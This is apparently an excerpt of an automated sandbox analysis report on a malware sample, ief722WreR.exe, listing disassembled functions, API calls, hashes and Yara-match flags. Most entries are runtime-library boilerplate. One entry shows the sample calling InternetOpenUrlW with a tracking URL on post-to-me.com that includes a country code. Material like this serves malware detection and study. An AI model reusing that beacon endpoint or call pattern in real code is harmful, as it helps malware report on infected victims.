                                                      • Opcode ID: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
                                                      • Instruction ID: 6785f0869033a78d9e1d3ccf4ec12d3ecd4d06d6a9d1a5793ffee6b17630f5bc
                                                      • Opcode Fuzzy Hash: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
                                                      • Instruction Fuzzy Hash: 522151B5A0131AAFCB00DF65DD499AFBBB9FF49741B104436E902F3290D7759901CBA8
                                                      APIs
                                                      • std::_Locinfo::_Locinfo.LIBCPMT ref: 024850A3
                                                      • std::_Locinfo::~_Locinfo.LIBCPMT ref: 024850B7
                                                      • std::_Locinfo::_Locinfo.LIBCPMT ref: 0248511C
                                                      • __Getcoll.LIBCPMT ref: 0248512B
                                                      • std::_Locinfo::~_Locinfo.LIBCPMT ref: 0248513B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Locinfostd::_$Locinfo::_Locinfo::~_$Getcoll
                                                      • String ID:
                                                      • API String ID: 2395760641-0
                                                      • Opcode ID: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
                                                      • Instruction ID: d8405f890bf42eb45cf1f74c1b39c6b03fa0b3ce4559dc9160be1f10f8ab27f2
                                                      • Opcode Fuzzy Hash: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
                                                      • Instruction Fuzzy Hash: DB2189B2824204AFDB05FFA5C484BEDBBB1BF50715F91800FE485AB280EB749544CFA1
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
                                                      • _free.LIBCMT ref: 00431F98
                                                      • _free.LIBCMT ref: 00431FBF
                                                      • SetLastError.KERNEL32(00000000), ref: 00431FCC
                                                      • SetLastError.KERNEL32(00000000), ref: 00431FD5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$_free
                                                      • String ID:
                                                      • API String ID: 3170660625-0
                                                      • Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                      • Instruction ID: 0958b0acb89a9b0c851ef96239832ae32a3192186555c964954bc496c6487c7c
                                                      • Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                      • Instruction Fuzzy Hash: EA01F936249A007BD7122B266C45D2B262DEBD977AF21212FF804933F2EF6C8D02412D
                                                      APIs
                                                      • GetLastError.KERNEL32(0248DAD7,0248DAD7,00000002,024AED35,024B3951,00000000,?,024A6A05,00000002,00000000,00000000,00000000,?,0248CF88,0248DAD7,00000004), ref: 024B21CA
                                                      • _free.LIBCMT ref: 024B21FF
                                                      • _free.LIBCMT ref: 024B2226
                                                      • SetLastError.KERNEL32(00000000,?,0248DAD7), ref: 024B2233
                                                      • SetLastError.KERNEL32(00000000,?,0248DAD7), ref: 024B223C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$_free
                                                      • String ID:
                                                      • API String ID: 3170660625-0
                                                      • Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                      • Instruction ID: 9f751a2d77698e7bc85e95714a32160c9d74b9882ae28fb9d16b69a7154dee3e
                                                      • Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                      • Instruction Fuzzy Hash: DC01D6366457007B931BAB365C44EEB262AAFD1B72B10012BFC15D6391EFE089128539
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                      • _free.LIBCMT ref: 00431F11
                                                      • _free.LIBCMT ref: 00431F39
                                                      • SetLastError.KERNEL32(00000000), ref: 00431F46
                                                      • SetLastError.KERNEL32(00000000), ref: 00431F52
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$_free
                                                      • String ID:
                                                      • API String ID: 3170660625-0
                                                      • Opcode ID: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                      • Instruction ID: 3b026b3c5eee41f9d7def55204e2a076619a9c86630fc827cc9980c008d650a8
                                                      • Opcode Fuzzy Hash: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                      • Instruction Fuzzy Hash: 6BF02D3A608A0077D61637356C06B1B26199FC9B26F31112FF815933F2EF2DC902452D
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,024AA9EC,?,00000000,?,024ACDE6,0248247E,00000000,?,00451F20), ref: 024B2145
                                                      • _free.LIBCMT ref: 024B2178
                                                      • _free.LIBCMT ref: 024B21A0
                                                      • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21AD
                                                      • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21B9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$_free
                                                      • String ID:
                                                      • API String ID: 3170660625-0
                                                      • Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                      • Instruction ID: 37aa7fd9bfcec6ab2cbedbe0f568f767f4d3db8be227dfbee11a694161e908fe
                                                      • Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                      • Instruction Fuzzy Hash: D0F0A9352447003BD3176736AC08BDB262A5FC2F62F15022BFD19923A0EFE18512853A
                                                      APIs
                                                        • Part of subcall function 0041273D: TlsGetValue.KERNEL32(?,?,00410B5B,00412C68,00000000,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412743
                                                      • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041794A
                                                        • Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FDA
                                                        • Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00420FF3
                                                        • Part of subcall function 00420FB3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421069
                                                        • Part of subcall function 00420FB3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421071
                                                      • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417958
                                                      • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417962
                                                      • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041796C
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0041798A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                      • String ID:
                                                      • API String ID: 4266703842-0
                                                      • Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                      • Instruction ID: 523e498e96a622df23a613ee45563367b5d22c9a8c27bf88e83bdf0efd96127b
                                                      • Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                      • Instruction Fuzzy Hash: B0F04C31A0021427CE15B7269912AEEB7269F80724B40012FF40183382DF6C9E9987CD
                                                      APIs
                                                        • Part of subcall function 024929A4: TlsGetValue.KERNEL32(?,?,02490DC2,02492ECF,00000000,?,02490DA0,?,?,?,00000000,?,00000000), ref: 024929AA
                                                      • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 02497BB1
                                                        • Part of subcall function 024A121A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 024A1241
                                                        • Part of subcall function 024A121A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 024A125A
                                                        • Part of subcall function 024A121A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 024A12D0
                                                        • Part of subcall function 024A121A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 024A12D8
                                                      • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 02497BBF
                                                      • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 02497BC9
                                                      • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 02497BD3
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 02497BF1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                      • String ID:
                                                      • API String ID: 4266703842-0
                                                      • Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                      • Instruction ID: a83c842435ca6e27417826ba7a964d08c1b266a7805b9cdadba250df14e66252
                                                      • Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                      • Instruction Fuzzy Hash: 62F0C2716002186BCF15F677982096EFF2BDF90B18B04426FD80053350DF65DA058FD1
                                                      APIs
                                                      • _free.LIBCMT ref: 00439E5D
                                                        • Part of subcall function 0043346A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                        • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                      • _free.LIBCMT ref: 00439E6F
                                                      • _free.LIBCMT ref: 00439E81
                                                      • _free.LIBCMT ref: 00439E93
                                                      • _free.LIBCMT ref: 00439EA5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                      • Instruction ID: 23fbe02493372c4549fca1a108de89c04d7fed3b0c796059023c71110852f737
                                                      • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                      • Instruction Fuzzy Hash: 35F04F72505600ABA620EF59E483C1773D9BB08B11F68694BF00CD7751CB79FC808B5D
                                                      APIs
                                                      • _free.LIBCMT ref: 024BA0C4
                                                        • Part of subcall function 024B36D1: HeapFree.KERNEL32(00000000,00000000,?,024BA35F,?,00000000,?,00000000,?,024BA603,?,00000007,?,?,024BA9F7,?), ref: 024B36E7
                                                        • Part of subcall function 024B36D1: GetLastError.KERNEL32(?,?,024BA35F,?,00000000,?,00000000,?,024BA603,?,00000007,?,?,024BA9F7,?,?), ref: 024B36F9
                                                      • _free.LIBCMT ref: 024BA0D6
                                                      • _free.LIBCMT ref: 024BA0E8
                                                      • _free.LIBCMT ref: 024BA0FA
                                                      • _free.LIBCMT ref: 024BA10C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                      • Instruction ID: 654b7c37884042a49afc0c137c61ddce4079d8ff2257fe4b2a94b73b21beabda
                                                      • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                      • Instruction Fuzzy Hash: ACF06232505220AB8672EF66E8C6C8777DAAE04750B64095BF048D7B11CB71F8A09E79
                                                      APIs
                                                      • _free.LIBCMT ref: 00431748
                                                        • Part of subcall function 0043346A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                        • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                      • _free.LIBCMT ref: 0043175A
                                                      • _free.LIBCMT ref: 0043176D
                                                      • _free.LIBCMT ref: 0043177E
                                                      • _free.LIBCMT ref: 0043178F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                      • Instruction ID: 2553f371f7fcd8ed3987e2465633d6fecf7e22fdbd4e0dd0ef6c31112bbbdc45
                                                      • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                      • Instruction Fuzzy Hash: 5EF030B0D007509BAA226F19AC414053B60AF2D727B04626BF41797273C738D952DF8E
                                                      APIs
                                                      • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCCF
                                                      • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CD00
                                                      • GetCurrentThread.KERNEL32 ref: 0041CD09
                                                      • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD1C
                                                      • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD25
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                      • String ID:
                                                      • API String ID: 2583373041-0
                                                      • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                      • Instruction ID: 58cdd2c6a275a740aba70ab995622b5563c0a51640fa297b0aaaaf7b877cb5c4
                                                      • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                      • Instruction Fuzzy Hash: 73F082B6200500AB8625EF62F9518F67775AFC4715310091EE44B46651CF28A982D76A
                                                      APIs
                                                      • _free.LIBCMT ref: 024B19AF
                                                        • Part of subcall function 024B36D1: HeapFree.KERNEL32(00000000,00000000,?,024BA35F,?,00000000,?,00000000,?,024BA603,?,00000007,?,?,024BA9F7,?), ref: 024B36E7
                                                        • Part of subcall function 024B36D1: GetLastError.KERNEL32(?,?,024BA35F,?,00000000,?,00000000,?,024BA603,?,00000007,?,?,024BA9F7,?,?), ref: 024B36F9
                                                      • _free.LIBCMT ref: 024B19C1
                                                      • _free.LIBCMT ref: 024B19D4
                                                      • _free.LIBCMT ref: 024B19E5
                                                      • _free.LIBCMT ref: 024B19F6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                      • Instruction ID: fb1bb5be7febef862022fbb464458d35641d881de5064fe1cdfc8ab087246599
                                                      • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                      • Instruction Fuzzy Hash: D8F03070D003509B9F726F26AD804453F61AF09B2270002ABF406977B2C774E862EFAE
                                                      APIs
                                                      • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0249CF36
                                                      • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0249CF67
                                                      • GetCurrentThread.KERNEL32 ref: 0249CF70
                                                      • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0249CF83
                                                      • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0249CF8C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                      • String ID:
                                                      • API String ID: 2583373041-0
                                                      • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                      • Instruction ID: 634eb2d87e94ed821d7307fdc3aea86e6dd17fac859f214e31ef4a9a8b1c95f7
                                                      • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                      • Instruction Fuzzy Hash: 7FF01236200500DBCE25FF62E690ABABFA6AFC8610310455FD58B07594DF25A946DB61
                                                      APIs
                                                      • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 02482E8E
                                                        • Part of subcall function 02481321: _wcslen.LIBCMT ref: 02481328
                                                        • Part of subcall function 02481321: _wcslen.LIBCMT ref: 02481344
                                                      • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 024830A1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InternetOpen_wcslen
                                                      • String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
                                                      • API String ID: 3381584094-4083784958
                                                      • Opcode ID: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
                                                      • Instruction ID: 3a708d444c607f1697bd817b8d7f1749b0c8bc1023139c773399686e55acc755
                                                      • Opcode Fuzzy Hash: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
                                                      • Instruction Fuzzy Hash: 4F5153A5E65344A8E320EFB0BC55B763378FF58712F10543BD528CB2B2E7A19944871E
                                                      APIs
                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 024A896A
                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 024A8A23
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CurrentImageNonwritable___except_validate_context_record
                                                      • String ID: fB$csm
                                                      • API String ID: 3480331319-1586063737
                                                      • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                      • Instruction ID: df6fa2852c09fe5f23a0799c00fc7f7790f618e07e14ce8f3082f429940796be
                                                      • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                      • Instruction Fuzzy Hash: 4941F430A00248DBCF10DF29C864AAEBFB5FF55328F14816BE9155B391D7329A01CF91
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\ief722WreR.exe,00000104), ref: 0042F753
                                                      • _free.LIBCMT ref: 0042F81E
                                                      • _free.LIBCMT ref: 0042F828
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: _free$FileModuleName
                                                      • String ID: C:\Users\user\Desktop\ief722WreR.exe
                                                      • API String ID: 2506810119-4191418122
                                                      • Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                      • Instruction ID: fa775896cd6cad66ce7c6a69fb092310498b308cf57115ff02981d914fd4ae43
                                                      • Opcode Fuzzy Hash: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                      • Instruction Fuzzy Hash: 8F31B371B00228AFDB21DF9AAC8199FBBFCEF95304B90407BE80497211D7749E45CB98
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\ief722WreR.exe,00000104), ref: 024AF9BA
                                                      • _free.LIBCMT ref: 024AFA85
                                                      • _free.LIBCMT ref: 024AFA8F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$FileModuleName
                                                      • String ID: C:\Users\user\Desktop\ief722WreR.exe
                                                      • API String ID: 2506810119-4191418122
                                                      • Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                      • Instruction ID: 90670392e91c76f0de834511ec291e6364f03e4880f5e8065bfcdd84af91bb2b
                                                      • Opcode Fuzzy Hash: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                      • Instruction Fuzzy Hash: A5319F71A00218EBDB21DF9ADC909DEBBFCEFA9710B11406BE80597621D7719A45CBA0
                                                      APIs
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0248C8DE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Exception@8Throw
                                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                      • API String ID: 2005118841-1866435925
                                                      • Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                      • Instruction ID: e156c074c35c76abf7a167dc6cb9f16a5921ac0b2c9ea4de9ba6ca0abff0be3e
                                                      • Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                      • Instruction Fuzzy Hash: C9F02BB28902086BCB08F554CC81BEF33989B15316F04806FEE42AB182EB689945CBB4
                                                      APIs
                                                      • IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
                                                      • GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
                                                      • ExitThread.KERNEL32 ref: 0042DFDA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                      • String ID: F(@
                                                      • API String ID: 3213686812-2698495834
                                                      • Opcode ID: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
                                                      • Instruction ID: 460a7fcc700e9d4f467f0dc096aafbc476958de37b1de63dc97b6f39ac05addf
                                                      • Opcode Fuzzy Hash: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
                                                      • Instruction Fuzzy Hash: 05F09772B8431675FA203B727D0BBAB15140F10B49F8A043FBE09D91C3DEACC550806E
                                                      APIs
                                                      • IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
                                                      • GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
                                                      • ExitThread.KERNEL32 ref: 0042DFDA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                      • String ID: F(@
                                                      • API String ID: 3213686812-2698495834
                                                      • Opcode ID: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
                                                      • Instruction ID: f8bb832dc8ad97d2a89c5ed14b9cd2946ef4cec1cab2ecc574275c3dd80a03eb
                                                      • Opcode Fuzzy Hash: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
                                                      • Instruction Fuzzy Hash: 50F05571BC431A36FA203BA17D0BB961A150F14B49F5A043BBF09991C3DAAC8550406E
                                                      APIs
                                                      • Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 004242F9
                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042430B
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00424319
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
                                                      • String ID: pScheduler
                                                      • API String ID: 1381464787-923244539
                                                      • Opcode ID: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
                                                      • Instruction ID: b798ba3940b90e8ef47deb55f62f39db73067ed213726d5ff045b7a271978ec1
                                                      • Opcode Fuzzy Hash: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
                                                      • Instruction Fuzzy Hash: 01F0EC31B012246BCB18FB55F842DAE73A99E40304791826FFC07A3582CF7CAA48C75D
                                                      APIs
                                                      • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E63F
                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E652
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0041E660
                                                      Strings
